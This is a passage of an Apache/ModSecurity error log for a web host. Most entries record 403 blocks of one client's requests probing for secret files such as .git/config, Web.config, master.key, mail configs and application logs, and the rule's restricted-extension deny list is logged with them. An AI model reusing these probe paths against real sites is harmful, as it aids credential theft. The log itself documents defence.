"OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cms-1.dev-unit.com"] [uri "/.git/config"] [unique_id "abL8NvIvXdYK816VHjIxWgAAABE"] [Fri Mar 13 01:03:20.809419 2026] [autoindex:error] [pid 614:tid 775] [client 74.7.227.151:54396] AH01276: Cannot serve directory /home/id/cms-1.dev-unit.com/assets/front/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.cms-1.dev-unit.com/assets/front/img [Fri Mar 13 18:05:51.902402 2026] [:error] [pid 18273:tid 18354] [client 93.123.109.246:45100] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/Web.config"] [unique_id "abQ13_97mFO6WwsNdNrpLQAAAE4"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:08:10.053685 2026] [:error] [pid 5203:tid 5232] [client 93.123.109.246:29748] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/var/log/dev.log"] [unique_id "abQ2aiR2JWhLCDdMx-Y2RgAAAUo"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:08:41.719763 2026] [:error] [pid 18275:tid 18369] [client 93.123.109.246:57846] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/storage/logs/laravel-2025-01-01.log"] [unique_id "abQ2iYbIVNslGX0MLW_LBQAAAIg"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:08:47.865913 2026] [:error] [pid 18275:tid 18356] [client 93.123.109.246:57844] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/storage/logs/laravel-2026-01-01.log"] [unique_id "abQ2j4bIVNslGX0MLW_LKwAAAII"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:10:03.359987 2026] [:error] [pid 18441:tid 18461] [client 93.123.109.246:30444] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".key"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/config/master.key"] [unique_id "abQ225OXjLb10hm6AuAbUQAAANI"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:11:25.741096 2026] [:error] [pid 5203:tid 5232] [client 93.123.109.246:29752] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/mailSettings.config"] [unique_id "abQ3LSR2JWhLCDdMx-Y6agAAAUo"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:11:25.747409 2026] [:error] [pid 18441:tid 18465] [client 93.123.109.246:29720] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/web.config"] [unique_id "abQ3LZOXjLb10hm6AuAcAAAAANY"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:11:33.710445 2026] [:error] [pid 18441:tid 18443] [client 93.123.109.246:29848] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/Web.config"] [unique_id "abQ3NZOXjLb10hm6AuAcEwAAAMA"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:12:07.873639 2026] [:error] [pid 18275:tid 18386] [client 93.123.109.246:10214] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/Web.config"] [unique_id "abQ3V4bIVNslGX0MLW_RJwAAAJY"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:19:23.938697 2026] [:error] [pid 18273:tid 18355] [client 93.123.109.246:53690] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/ssmtp.conf"] [unique_id "abQ5C_97mFO6WwsNdNrrUAAAAE8"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:19:27.758569 2026] [:error] [pid 18441:tid 18456] [client 93.123.109.246:15532] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/.plesk/mail.conf"] [unique_id "abQ5D5OXjLb10hm6AuAeKwAAAM0"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:19:28.864095 2026] [:error] [pid 18441:tid 18457] [client 93.123.109.246:53758] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/etc/mail/auth.conf"] [unique_id "abQ5EJOXjLb10hm6AuAeLgAAAM4"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:19:37.449925 2026] [:error] [pid 18275:tid 18360] [client 93.123.109.246:15584] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/.plesk/email.conf"] [unique_id "abQ5GYbIVNslGX0MLW_enQAAAIQ"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:19:40.212302 2026] [:error] [pid 18441:tid 18460] [client 93.123.109.246:13772] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/.cpanel/mail.conf"] [unique_id "abQ5HJOXjLb10hm6AuAeNAAAANE"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:19:40.217120 2026] [:error] [pid 18273:tid 18359] [client 93.123.109.246:13814] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/.cpanel/email.conf"] [unique_id "abQ5HP97mFO6WwsNdNrrXgAAAFE"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:20:02.694594 2026] [:error] [pid 18275:tid 18360] [client 93.123.109.246:37484] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/.ispconfig/mail.conf"] [unique_id "abQ5MobIVNslGX0MLW_fVgAAAIQ"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:20:19.169409 2026] [access_compat:error] [pid 23521:tid 23569] [client 93.123.109.246:42536] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/email.py, referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:21:24.407752 2026] [:error] [pid 5203:tid 5246] [client 93.123.109.246:40860] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/src/main/resources/application.conf"] [unique_id "abQ5hCR2JWhLCDdMx-ZIMAAAAVg"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:22:04.840691 2026] [:error] [pid 18275:tid 18376] [client 93.123.109.246:45024] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/storage/logs/smtp.log"] [unique_id "abQ5rIbIVNslGX0MLW_iOAAAAIw"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:22:04.852919 2026] [:error] [pid 18268:tid 18327] [client 93.123.109.246:44936] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/logs/sendmail.log"] [unique_id "abQ5rP2mRPM-PnGy3vl6wQAAABE"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:22:04.853387 2026] [:error] [pid 23521:tid 23551] [client 93.123.109.246:44898] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/logs/email.log"] [unique_id "abQ5rClOeXKcdbjGtw57KQAAAQU"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:22:12.637502 2026] [:error] [pid 18275:tid 18358] [client 93.123.109.246:58298] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/storage/logs/mail.log"] [unique_id "abQ5tIbIVNslGX0MLW_ibwAAAIM"], referer: http://www.cms-1.dev-unit.com/ [Fri Mar 13 18:22:12.637502 2026] [:error] [pid 5203:tid 5223] [client 93.123.109.246:58310] [client 93.123.109.246] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ 